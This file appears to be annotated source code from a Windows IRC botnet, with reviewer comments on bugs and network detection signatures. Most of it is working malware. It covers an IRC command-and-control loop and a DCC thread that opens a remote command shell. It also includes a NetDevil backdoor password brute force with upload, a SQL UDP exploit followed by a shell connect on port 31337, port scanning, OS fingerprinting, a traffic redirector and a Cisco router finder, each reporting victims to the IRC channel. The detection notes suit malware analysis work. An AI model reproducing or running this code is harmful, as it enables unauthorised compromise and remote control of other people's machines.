// Forcibly stops the bot thread recorded in slot `threadnum` of the global
// threads[] table and resets every field of that slot.
//
// threadnum: index into threads[]; slot 0 and anything >= MAXTHREADS are ignored
//            (the role of slot 0 is not visible here).
// Returns TRUE when the slot held a non-zero thread handle, FALSE otherwise.
//
// Review notes: TerminateThread is a forced, asynchronous kill that runs none of
// the target thread's own cleanup; the handle is zeroed without CloseHandle, so
// the kernel handle itself is never released.
BOOL killthread(int threadnum)
{
	BOOL threadkilled = FALSE;
				
	if ((threadnum>0) && (threadnum<MAXTHREADS)) {
		// Called before the handle is checked, so a zero handle reaches
		// TerminateThread as well (the call then simply fails).
		TerminateThread(threads[threadnum].tHandle, 0);
		if (threads[threadnum].tHandle != 0) 
			threadkilled = TRUE;

		threads[threadnum].tHandle = 0;
		threads[threadnum].id = 0;
		threads[threadnum].parent = 0;

		// A slot may also own a child process (pid); it is killed with the thread.
		if(threads[threadnum].pid > 0)
			killProcess(threads[threadnum].pid);
		threads[threadnum].pid = 0; 
		
		threads[threadnum].name[0] = '\0';
		threads[threadnum].nick[0] = '\0';

		// Both sockets are closed unconditionally, even when the field is 0.
		fclosesocket(threads[threadnum].sock);
		threads[threadnum].sock = 0;
		fclosesocket(threads[threadnum].csock);
		threads[threadnum].csock = 0;
	}

	return (threadkilled);
}
// Estimates upload bandwidth by POSTing NUM_KILOBYTES KiB of filler to
// TCP port 80 on szHost and timing the send loop.
//
// szHost: hostname or dotted IP; rejected (returns 0) if longer than MAXHOSTNAME.
// Returns the estimated rate in Kbit/s (1024-based), or 0 on any resolution,
// socket, connect or send failure.
//
// Review notes on the code as written:
//  - szBuf and szPostReq come from new[] but are released with free():
//    mismatched allocator (undefined behaviour in C++).
//  - iChar can be 0 (rand() % 255 == 0); szBuf is then an empty string and only
//    the HTTP header is timed.
//  - "Content-Length: %d" is passed an unsigned long.
//  - On the resolve/socket/connect failure paths the socket (when already
//    created) is not closed.
//  - Network footprint: one HTTP/1.0 POST whose body is a single byte value
//    repeated NUM_KILOBYTES*1024 times — an easy pattern for a traffic rule.
unsigned long GetSpeed(char *szHost) {
	if(strlen(szHost) > MAXHOSTNAME) return 0;
	unsigned long lBufSize=NUM_KILOBYTES*1024;
	SOCKET sSock;
	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	if ((ssin.sin_addr.s_addr = ResolveAddress(szHost)) == 0) return 0;
	ssin.sin_port = fhtons(80);
	if ((sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
	if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return 0;
	char *szBuf=new char[lBufSize+3];
	srand(GetTickCount());
	int iChar=(char)(rand() % 255);
	// Zero one byte past the filler so szBuf stays NUL-terminated after the fill.
	memset(szBuf,	0,		lBufSize+1	);
	memset(szBuf,	iChar,	lBufSize	);
	unsigned long lStrLen=strlen(szBuf);
	// +1002 leaves room for the header, the trailing CRLF and the terminator.
	char *szPostReq=new char[lBufSize+1002];
	sprintf(szPostReq, "POST / HTTP/1.0\r\n"
		"Host: %s\r\n"
		"Content-Length: %d\r\n"
		"\r\n",
		szHost, lStrLen);
	strcat(szPostReq, szBuf);
	strcat(szPostReq, "\r\n");
	lStrLen=strlen(szPostReq);
	unsigned long lStartMS=GetTickCount();
	// Send in 1 KiB slices; the last slice carries the remainder.
	for(unsigned long l=0; l<lStrLen; l+=1024) {
		if(lStrLen-l < 1024) {
			if(fsend(sSock, szPostReq+l, lStrLen-l,0) == SOCKET_ERROR) { 
				fclosesocket(sSock);
				free(szBuf); 
				free(szPostReq);
				return 0; 
			}
		} else {
			if(fsend(sSock, szPostReq+l, 1024,0) == SOCKET_ERROR) { 
				fclosesocket(sSock);
				free(szBuf); 
				free(szPostReq);
				return 0; 
			}
		}
	}
	unsigned long lEndMS=GetTickCount();

	// Tick resolution is milliseconds; a zero elapsed time is clamped to 1 s
	// to avoid a division by zero below.
	float fElapsedS=(float)(lEndMS-lStartMS)/1000.0f;
	if(fElapsedS==0.0f) fElapsedS=1.0f;

	float fBytesPS=(float)lStrLen/fElapsedS;
	float fKBytesPS=fBytesPS/1024.0f;		
	float fBitsPS=fBytesPS*8.0f;			
	float fKBitsPS=fBitsPS/1024.0f;			

	fclosesocket(sSock);
	free(szBuf); 
	free(szPostReq);

	return (unsigned long)fKBitsPS;
}
// Walks the global passwords[] list against a NetDevil backdoor listener at
// exinfo.ip:exinfo.port; on a "passed" reply it calls NetDevil_Upload and
// reports the result over IRC / the log.
//
// exinfo: target ip/port, exploit index, IRC socket/channel and silent/notice flags.
// Returns TRUE only when NetDevil_Upload reports 1; FALSE otherwise.
//
// Review notes on the code as written:
//  - passwords[i-1] is read when i may be 0, i.e. one element before the array.
//  - passwords[i-i] in the status message is always passwords[0] (i-i == 0);
//    it looks like a typo for i-1.
//  - The fconnect result is never checked; a failed connect is only noticed
//    when the first select/recv fails.
//  - recv may fill the whole buffer, leaving no NUL for strcmp/sprintf.
//  - Detection: the "pass_pleaz" / "passed" exchange and the "nd <ip> <pw>"
//    command are the protocol tokens visible on the wire.
BOOL NetDevil(EXINFO exinfo)
{
	char buffer[IRCLINE];
	DWORD mode=0;

	SOCKET ssock;
	if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) 
		return FALSE;

	SOCKADDR_IN sin;
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = finet_addr(exinfo.ip);
	sin.sin_port = fhtons(exinfo.port);

	fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
	// mode == 0 selects blocking mode for the socket.
	fioctlsocket(ssock,FIONBIO,&mode);

	for (int i=0; passwords[i]; i++) {
		Sleep(50);

		memset(buffer,0,sizeof(buffer));

		// NetDevil_Receive waits (with a timeout) for readability and closes
		// ssock itself on timeout; the fclosesocket after the loop then runs
		// on an already-closed socket.
		if (NetDevil_Receive(ssock) == -1) 
			break;
		if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0) 
			break;
		if (strcmp(buffer,"passed") == 0) {
			sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]); 
			fsend(ssock, buffer, strlen(buffer), 0);	

			if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
				fclosesocket(ssock);

				_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
				if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
				addlog(buffer);
				exploit[exinfo.exploit].stats++;

				return TRUE;
			}
			break;	
		}
		if (strcmp(buffer,"pass_pleaz") == 0) {
			memset(buffer,0,sizeof(buffer));
			sprintf(buffer,"pass_pleaz%s",passwords[i]); 
			fsend(ssock,buffer ,strlen(buffer), 0);

			continue;
		}
		else break;
	}
	fclosesocket(ssock);

	return FALSE;
}
// Thread body for a minimal identd: listens on TCP 113 (all interfaces) and
// answers every request with a random user id, so that IRC servers doing an
// ident lookup get a plausible reply.
//
// param: the threads[] slot index, passed as an integer cast to LPVOID.
// Never returns normally; exits via ExitThread(0) after clearing its slot.
//
// Review notes on the code as written:
//  - csock is only assigned inside the accept loop, but is closed at the end
//    on every path, so a failure before accept closes an uninitialised value.
//  - buffer is not cleared or NUL-terminated after frecv before Split() runs.
//  - csin.sin_port is logged in network byte order (no ntohs).
//  - Each accepted client socket is never closed inside the loop; only the
//    last one is closed after the loop ends.
//  - Detection: an unexpected listener on 113 plus the fixed reply shape
//    " : USERID : UNIX : <nick>" in the log line and on the wire.
DWORD WINAPI IdentThread(LPVOID param)
{
	char user[12], buffer[IRCLINE];

	int threadnum = (int)param;
	BOOL success = FALSE;

	SOCKET ssock,csock;

	SOCKADDR_IN ssin, csin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)113);
	ssin.sin_addr.s_addr=INADDR_ANY;

	if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
		// Recorded in the slot so killthread()/clearthread() can close it.
		threads[threadnum].sock = ssock;
		if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
			if (flisten(ssock, 5) != SOCKET_ERROR) {
				int csin_len = sizeof(csin);

				while (1) {
					if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
						break;

					sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
					addlog(buffer);

					if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
						// Second argument 0: the split result is discarded; only
						// the in-place modification of buffer (if any) matters.
						Split(buffer,0);

						memset(user, 0, sizeof(user));
						_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
	
						if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
							success = TRUE;

					}
				}
			}
		}
	}

	// success reflects whether at least one reply was ever sent, not the
	// reason the loop ended.
	if (!success) {
		sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
		addlog(buffer);
	}

	fclosesocket(ssock);
	fclosesocket(csock);
	clearthread(threadnum);

	ExitThread(0);
}
// Thread body that keeps the bot connected to its IRC server: resolves
// irc.host, connects, runs IRC_ReceiveLoop, and reconnects according to the
// loop's return code.
//
// param: pointer to an IRC struct. It is copied by value immediately and the
//        caller is signalled through gotinfo = TRUE that the copy is done
//        (so the caller may reuse its struct afterwards — inferred from the
//        pattern, not visible here).
// Returns the last IRC_ReceiveLoop result (0 never reaches the return since
// it loops; 2 is the only value that breaks out of the loop).
//
// Review note: the socket is closed here at L245 after IRC_ReceiveLoop, which
// itself closes the socket on its own send-failure path — a double close on
// that path.
DWORD WINAPI IRC_Connect(LPVOID param)
{
	IRC irc = *((IRC *)param);
	IRC *ircs = (IRC *)param;
	ircs->gotinfo = TRUE;

	int rval = 0;

	SOCKADDR_IN ssin;
	while (1) {
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons(irc.port);
		// A failed resolution ends the thread instead of retrying.
		if ((ssin.sin_addr.s_addr=ResolveAddress(irc.host)) == 0)
			break;

		// A fresh random nick is generated for every connection attempt.
		memset(threads[irc.threadnum].nick, 0, sizeof(threads[irc.threadnum].nick));
		rndnick(threads[irc.threadnum].nick, nicktype, nickprefix);

		if ((threads[irc.threadnum].sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
			Sleep(5000);
			continue;
		}

		// Connect failure: close, drop the local DNS cache, back off 5 s.
		if (fconnect(threads[irc.threadnum].sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
			fclosesocket(threads[irc.threadnum].sock);
			FlushDNSCache();
			Sleep(5000);
			continue;
		}

		#ifdef DEBUG_CONSOLE
		printf("Bot started and connect to %s.\n", irc.host);
		#endif
		addlogv("[MAIN]: Connected to %s.", irc.host);

		rval = IRC_ReceiveLoop(threads[irc.threadnum].sock, irc.host, irc.channel, irc.chanpass, threads[irc.threadnum].nick, irc.clone);
		fclosesocket(threads[irc.threadnum].sock);

		// 0: reconnect now; 1: wait 15 minutes (900000 ms) then reconnect;
		// 2: quit the thread. Any other value also loops again.
		if (rval == 0) 
			continue;
		else if (rval == 1) {
			Sleep(900000);
			continue;
		}
		else if (rval == 2) 
			break;
	}
	clearthread(irc.threadnum);

	return rval;
}
// Thread body bridging an outbound DCC chat connection (dcc.host:dcc.port) to
// the bot's remote command shell: every line received from the DCC peer is
// handed to send_commands() until the peer disconnects or the RCMD thread
// goes away.
//
// param: pointer to a DCC struct, copied by value; gotinfo = TRUE signals the
//        caller that the copy is complete.
// Never returns normally; exits via ExitThread(1) on setup failure, ExitThread(0)
// otherwise.
//
// Review notes on the code as written:
//  - When CreateSock fails, irc_privmsg is called with ssock == INVALID_SOCKET
//    (the intended IRC socket is not used on that path).
//  - frecv may fill all 4096 bytes, after which strcat(buffer,"\n") writes past
//    the end of buffer.
//  - The "Failed to send" message is emitted on every loop exit, including a
//    normal peer disconnect.
//  - Detection: outbound DCC connection followed by interactive shell traffic
//    on the same socket.
DWORD WINAPI DCCChatThread(LPVOID param)
{
	DCC dcc = *((DCC *)param);
	DCC *dccs = (DCC *)param;
	dccs->gotinfo = TRUE;

	char buffer[4096];

	SOCKET ssock;
	if ((ssock = CreateSock(dcc.host,dcc.port)) == INVALID_SOCKET) { 
		sprintf(buffer,"[DCC]: Failed to open socket.");
		if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
		addlog(buffer);

		clearthread(dcc.threadnum);

		ExitThread(1);
	}
	// open_cmd attaches the remote command shell to the freshly connected socket.
	if (open_cmd(ssock,"") == -1) {
		sprintf(buffer,"[DCC]: Failed to open remote command shell.");
		if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
		addlog(buffer);

		fclosesocket(ssock);
		clearthread(dcc.threadnum);

		ExitThread(1);
	}
	Sleep(100);

	while (1) {
		memset(buffer, 0, sizeof(buffer));
		if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0) 
			break;

		// The shell expects newline-terminated commands.
		strcat(buffer,"\n");
		if (!send_commands(buffer))
			break;

		Sleep(100);
		// Stop when the remote-command thread is no longer registered.
		if (findthreadid(RCMD_THREAD) == 0)
			break;
	}
	sprintf(buffer,"[DCC]: Failed to send to Remote command shell.");
	if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
	addlog(buffer);
	
	fclosesocket(ssock);
	clearthread(dcc.threadnum);
	
	ExitThread(0);
}
// port redirect function
// Listener half of the TCP port-redirect feature: binds redirect.lport on all
// interfaces and spawns a RedirectLoopThread for every accepted client.
//
// param: pointer to a REDIRECT struct, copied by value; gotinfo = TRUE signals
//        the spawner that the copy is complete.
// Never returns normally; exits via ExitThread(0).
//
// Review notes on the code as written:
//  - The local copy `redirect` is handed by address to each child thread and
//    then reused for the next client; the `gotinfo` spin-wait is the only thing
//    preventing the child from reading a half-updated struct.
//  - The `if` at the CreateThread call is an assignment, not a comparison
//    (it tests the stored handle for non-zero).
//  - csock is closed after the loop even when no client was ever accepted,
//    i.e. on an uninitialised value.
//  - fWSAAsyncSelect is called with a NULL window handle; its effect here is
//    not clear from the visible code.
//  - Detection: a new listening port (lport) that proxies to another host.
DWORD WINAPI RedirectThread(LPVOID param)
{
	REDIRECT redirect = *((REDIRECT *)param);
	REDIRECT *redirectp = (REDIRECT *)param;
	redirectp->gotinfo = TRUE;

	char sendbuf[IRCLINE];
	DWORD id;

	SOCKADDR_IN rsin, csin;	
	memset(&rsin, 0, sizeof(rsin));
	rsin.sin_family = AF_INET;
	rsin.sin_port = fhtons(redirect.lport);
	rsin.sin_addr.s_addr = INADDR_ANY;

	int csin_len = sizeof(csin);

	SOCKET rsock, csock;
	if ((rsock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		threads[redirect.threadnum].sock = rsock;

		fWSAAsyncSelect(rsock, 0, WM_USER + 1, FD_READ);
		if (fbind(rsock, (LPSOCKADDR)&rsin, sizeof(rsin)) == 0) {
			if (flisten(rsock, 10) == 0) {
				while(1) {
					if ((csock = faccept(rsock, (LPSOCKADDR)&csin, &csin_len)) != INVALID_SOCKET) {
						redirect.csock = csock;

						// Reset the handshake flag before starting the child so
						// the spin-wait below observes the child's own write.
						redirect.gotinfo = FALSE;
						sprintf(sendbuf,"[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, redirect.threadnum); 
						redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,csock);
						threads[redirect.cthreadnum].parent = redirect.threadnum;
						if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoopThread,(LPVOID)&redirect,0,&id)) {
							while (redirect.gotinfo == FALSE) 
								Sleep(50);
						} else {
							addlogv("[REDIRECT]: Failed to start client thread, error: <%d>.", GetLastError());
							break;
						}
					}
				}
			}
		}
	}

	fclosesocket(csock);
	fclosesocket(rsock);
	clearthread(redirect.threadnum);

	ExitThread(0);
}
// Remote OS fingerprint: connects to host:target_port, reads a banner, sends
// the global send_buff and classifies the reply by the bytes at offsets 8
// and 12 (major/minor version fields, by the ID_* mapping used below).
//
// host:        dotted IPv4 address (finet_addr, no DNS).
// target_port: TCP port to probe.
// sp:          out-parameter filled with atoi() of the reply at offset 37
//              (meaning not visible here); left untouched on failure paths.
// Returns one of ID_WIN2K / ID_WINXP / ID_WIN2K3 / ID_WINNT / ID_UNKNOWN on a
// completed exchange, or 1 on any failure — whether 1 collides with an ID_*
// value is not visible here.
//
// Review notes: the reply is indexed at [8], [12] and [37] without checking
// how many bytes frecv actually returned, and the buffer is not re-cleared
// between the two receives.
int check_os(char *host,unsigned short target_port, int *sp) 
{	
	SOCKET sSock;
	if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_addr.s_addr = finet_addr(host);
		ssin.sin_port = fhtons((unsigned short)target_port);

		if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
			char recv_buff[5000];
			memset(recv_buff,0,sizeof(recv_buff));

			// Wait at most 5 s for the initial banner.
			TIMEVAL timeout;
			timeout.tv_sec = 5;
			timeout.tv_usec = 0;
			fd_set fd;
			FD_ZERO(&fd);
			FD_SET(sSock, &fd);

			if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
				if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) { 
					if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
						// No select() guards this second recv; it blocks without a timeout.
						if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
							fclosesocket(sSock); 
	
							*sp=atoi(&recv_buff[37]); 
	
							if (recv_buff[8] == 5 && recv_buff[12] == 0)
								return ID_WIN2K;
							else if	(recv_buff[8] == 5 && recv_buff[12] == 1)
								return ID_WINXP;
							else if	(recv_buff[8] == 5 && recv_buff[12] == 2)	
								return ID_WIN2K3;
							else if	(recv_buff[8] == 4)
								return ID_WINNT;
							else
								return ID_UNKNOWN;
						}
					}
				}
			}
		}
		fclosesocket(sSock);
	}
	
	return 1;
}
// Sends the global badbuffer datagram to exinfo.ip:exinfo.port over UDP and
// then tries ConnectShell() on TCP 31337, reporting the outcome over IRC.
//
// target: IRC destination (channel/nick) for status messages.
// conn:   IRC* passed as void*.
// exinfo: target ip/port, exploit index and reporting flags.
// Returns FALSE on every path, including the "exploited" branch.
//
// Review notes on the code as written:
//  - The condition `(rc=fconnect(...))=SOCKET_ERROR` is an assignment, so rc is
//    always SOCKET_ERROR and the `rc==0` body that sends the datagram is
//    unreachable as written.
//  - sock is declared `unsigned int` but compared to INVALID_SOCKET; on Win32
//    both are all-ones values, so the comparison still works incidentally.
//  - Detection: a UDP datagram to the SQL port followed by a TCP connect to
//    port 31337 on the same host.
BOOL thcsql(char *target, void* conn,EXINFO exinfo)
{
	IRC* irc=(IRC*)conn;
	unsigned int sock,rc;
	struct sockaddr_in sqludp;

	if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
		return FALSE;

	sqludp.sin_family=AF_INET;
	sqludp.sin_addr.s_addr=finet_addr(exinfo.ip);
	sqludp.sin_port=fhtons(exinfo.port);

	if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR)
	{
		if(rc==0)
		{
			fsend(sock,badbuffer,sizeof(badbuffer)-1,0);
			Sleep(1000);
			if (ConnectShell(exinfo, 31337))
			{
				exploit[exinfo.exploit].stats++;
				if (!exinfo.silent)
					irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			}
			else
				if (!exinfo.silent && exinfo.verbose)
					irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		}
	}

	// shutdown(SD_SEND == 1) then close.
	fshutdown(sock,1);
	fclosesocket(sock);
	return FALSE;
}
// Non-blocking TCP connect probe: reports whether ip:port accepts a
// connection within `delay` seconds.
//
// ip:    IPv4 address already in network byte order (assigned directly to S_addr).
// port:  TCP port in host byte order.
// delay: timeout in whole seconds.
// Returns TRUE when select() reports the socket writable before the timeout,
// FALSE on socket failure, timeout or select error.
//
// Review notes: the fconnect result (expected to be SOCKET_ERROR/WSAEWOULDBLOCK
// in non-blocking mode) is not inspected, and only the write set is checked,
// so a refused connection is reported the same way as a timeout.
// `FD_SET rset;` uses the Winsock type name (same spelling as the macro).
BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
{
	SOCKADDR_IN sin;
	unsigned long blockcmd=1;

	SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
	if (sock == INVALID_SOCKET) 
		return FALSE;

	sin.sin_family = AF_INET;
	sin.sin_addr.S_un.S_addr = ip;
	sin.sin_port = fhtons((unsigned short)port);
	// blockcmd == 1 switches the socket to non-blocking mode.
	fioctlsocket(sock,FIONBIO,&blockcmd);
	fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));

	TIMEVAL timeout;
	timeout.tv_sec=delay;
	timeout.tv_usec=0;
	FD_SET rset;
	FD_ZERO(&rset);
	FD_SET(sock,&rset);

	int i = fselect(0,0,&rset,0,&timeout);
	fclosesocket(sock);

	if (i<=0) 
		return FALSE;
	else 
		return TRUE;
}
// Variant of killthread() from another build of the same code base: forcibly
// stops the thread in slot `threadnum` and resets the slot, but (unlike the
// other variant on this page) no longer clears the nick field or closes the
// slot's server socket — those lines are commented out.
//
// threadnum: index into threads[]; slot 0 and >= MAX_THREADS are ignored.
// Returns TRUE when the slot held a non-zero thread handle.
//
// Review notes: TerminateThread runs none of the target's cleanup; the handle
// is zeroed without CloseHandle, so the kernel handle is never released.
BOOL killthread(int threadnum)
{
	BOOL threadkilled = FALSE;

	if ((threadnum>0) && (threadnum<MAX_THREADS))
	{
		// Terminate is issued before the handle is checked for zero.
		TerminateThread(threads[threadnum].tHandle, 0);
		if (threads[threadnum].tHandle != 0) 
			threadkilled = TRUE;

		threads[threadnum].tHandle = 0;
		threads[threadnum].id = 0;
		threads[threadnum].parent = 0;

#ifndef NO_PROCESS
		// Builds with process support also kill the child process of this slot.
		if(threads[threadnum].pid > 0)
			KillPid(threads[threadnum].pid);
#endif

		threads[threadnum].pid = 0; 
		threads[threadnum].name[0] = '\0';
//		threads[threadnum].nick[0] = '\0';

		// Server socket intentionally left open in this variant (see commented lines).
//		fclosesocket(threads[threadnum].sock);
//		threads[threadnum].sock = 0;
		fclosesocket(threads[threadnum].csock);
		threads[threadnum].csock = 0;
	}

	return threadkilled;
}
// checks ip for open port
// Thread body for one port-scan probe: does a blocking TCP connect to
// scan.addy:scan.port and announces an open port over IRC and the log.
//
// param: pointer to a SCAN struct, copied by value; cgotinfo = TRUE signals
//        the spawner that the copy is complete.
// Returns 0 always.
//
// Review notes on the code as written:
//  - sendbuf is `static`, so concurrent scan threads share one buffer and can
//    interleave their messages.
//  - fclosesocket is called even when fsocket failed (sock == INVALID_SOCKET).
//  - The connect is blocking with no timeout; the thread lives until the
//    stack's connect timeout expires for filtered hosts.
//  - Detection: the literal "nzm (portscan.plg)" tag in the IRC/log message.
DWORD WINAPI ScanConnectThread(LPVOID param)
{
	static char sendbuf[IRCLINE];

	SCAN scan = *((SCAN *)param);
	SCAN *scans = (SCAN *)param;
	scans->cgotinfo = TRUE;

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)scan.port);
	ssin.sin_addr = scan.addy;

	SOCKET sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock != INVALID_SOCKET) {
		DWORD err = fconnect(sock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN));
		// Stored after the (blocking) connect, so killthread() cannot close it
		// while the connect is still in progress.
		threads[scan.threadnum].sock = sock;
		if (err != SOCKET_ERROR) {
			sprintf(sendbuf,"nzm (portscan.plg) »»  IP: %s Port: %d is open.", finet_ntoa(scan.addy), scan.port);
			irc_privmsg(scan.sock, scan.chan, sendbuf, scan.notice);
			addlog(sendbuf);
		}
	}
	fclosesocket(sock);

	return 0;
}
// Opens a blocking TCP connection to host:port, accepting either a dotted
// IPv4 address or a hostname (resolved with gethostbyname).
//
// host: dotted IP or hostname.
// port: TCP port in host byte order.
// Returns the connected socket, or INVALID_SOCKET on socket, DNS or connect
// failure.
//
// Review note: on the DNS-failure path the socket created above is returned
// as INVALID_SOCKET without being closed, leaking the descriptor.
SOCKET CreateSock(char *host, unsigned short port)
{
	SOCKET ssock;
	if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
		return INVALID_SOCKET;

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(port);

	// Try to parse host as a literal address first; fall back to DNS only
	// when inet_addr rejects it.
	IN_ADDR in;
	in.s_addr = finet_addr(host);
	LPHOSTENT Hostent = NULL;
	if (in.s_addr == INADDR_NONE)
		Hostent = fgethostbyname(host); //hostname
	if (Hostent == NULL && in.s_addr == INADDR_NONE)  //error dns
		return INVALID_SOCKET;
	// First address of the hostent list when DNS was used, else the literal.
	ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in));

	if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) {
		fclosesocket(ssock);
		return INVALID_SOCKET;
	}

	return (ssock);
}
// Sends the global HTTP_REQUEST to exinfo.ip:exinfo.port and reports a hit
// when the reply contains both "HTTP/1.0 200 OK" and "cisco".
//
// exinfo: target ip/port, exploit index, IRC socket/channel and notice flag.
// Returns TRUE on a matching reply, FALSE otherwise.
//
// Review notes on the code as written:
//  - SocketFD is an int compared with `< 0`; INVALID_SOCKET converts to -1 so
//    this happens to work.
//  - The socket is closed only on the success path after frecv; every other
//    return leaks it.
//  - The report format has one %s but is given two arguments (exploit name,
//    ip); the IP is never printed.
//  - The reply buffer is zeroed before frecv but a full 4096-byte read leaves
//    it unterminated for strstr.
//  - `return FALSE;;` — stray empty statement.
BOOL CiscoHTTP(EXINFO exinfo)
{

   int ret,SocketFD;
   char buffer[4096];
   if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
   SOCKADDR_IN ssin;
   memset(&ssin, 0, sizeof(ssin));
   ssin.sin_family = AF_INET;
   ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
   ssin.sin_port = fhtons((unsigned short)exinfo.port);
   if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
		if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
			return FALSE;
		memset(buffer, 0, sizeof(buffer));
		if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
			return FALSE;
		fclosesocket(SocketFD);
		// Fewer than 5 bytes cannot hold a status line worth matching.
		if(ret < 5)
			return FALSE;
		if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
			return FALSE;

		char sendbuf[IRCLINE];
		_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
		irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
		addlog(sendbuf);
		exploit[exinfo.exploit].stats++;
		return TRUE;
	}
    return FALSE;
}
// Registers with the IRC server (optional PASS, then NICK/USER) and then reads
// lines from `sock`, feeding each to IRC_ProtocolParse until the connection
// drops or the parser asks to leave.
//
// sock:     connected IRC socket.
// server, channel, chanpass, nick: forwarded to IRC_ProtocolParse.
// clone:    forwarded to IRC_ProtocolParse (meaning not visible here).
// Returns 0 = reconnect, 1 = disconnect (caller sleeps), 2 = quit.
//
// Review notes on the code as written:
//  - `repeat` is decremented after the parser's return value is stored, so the
//    switch below tests parser result minus one (-1 here means the parser
//    returned 0, and so on).
//  - nickbuf is passed uninitialised to rndnick (which presumably fills it).
//  - On the send failure at registration the socket is closed here, and the
//    caller IRC_Connect closes it again after the return.
//  - The "FIX ME" below is the author's: a recv larger than one line set is
//    split without carrying partial lines over to the next read.
int IRC_ReceiveLoop(SOCKET sock, char *server, char *channel, char *chanpass, char *nick, int clone)
{
	char buffer[4096], masters[MAXLOGINS][MAXIDENT], *lines[MAX_LINES], nickbuf[MAXNICKLEN], host[MAXHOSTNAME];
	int i, numlines, repeat, in_channel=0;

	// No authenticated masters at the start of a connection.
	for (i = 0; i < MAXLOGINS; i++)
		masters[i][0] = '\0';

	if (serverpass[0] != '\0')
		irc_sendv(sock,"PASS %s\r\n",serverpass);

 	sprintf(buffer, "NICK %s\r\nUSER %s 0 0 :%s\r\n", nick, rndnick(nickbuf,LETTERNICK, FALSE), nick);
	if (fsend(sock, buffer, strlen(buffer), 0) == SOCKET_ERROR) {
		fclosesocket(sock);
		Sleep(5000);
		return 0;
	}

